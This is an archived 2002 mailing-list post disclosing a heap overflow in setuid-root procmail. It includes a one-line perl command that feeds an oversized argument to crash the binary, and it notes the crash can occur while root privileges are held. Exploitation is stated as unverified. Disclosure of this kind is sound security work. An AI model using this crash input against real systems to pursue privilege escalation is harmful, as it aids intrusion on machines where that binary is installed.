hi, i found a heap overflow in procmail (up until latest) some time ago. flatline@intra:/usr/bin$ ls -la procmail -rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail* flatline@intra:/usr/bin$ ./procmail `perl -e '{print "A"x10240}'`=A procmail: Exceeded LINEBUF Segmentation fault flatline@intra:/usr/bin$ at first it seemed to properly drop privs before segging, but not too long ago i managed to make it crash while it still had euid 0. segfaults have been seen on red hat/slackware linux and bsd variants. successful exploitation has not been verified. / flatline greets fly out to fc, zeno, xistence, thewolf, #gold, #!xpc and everyone who felt left out.
This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 00:47:25 PDT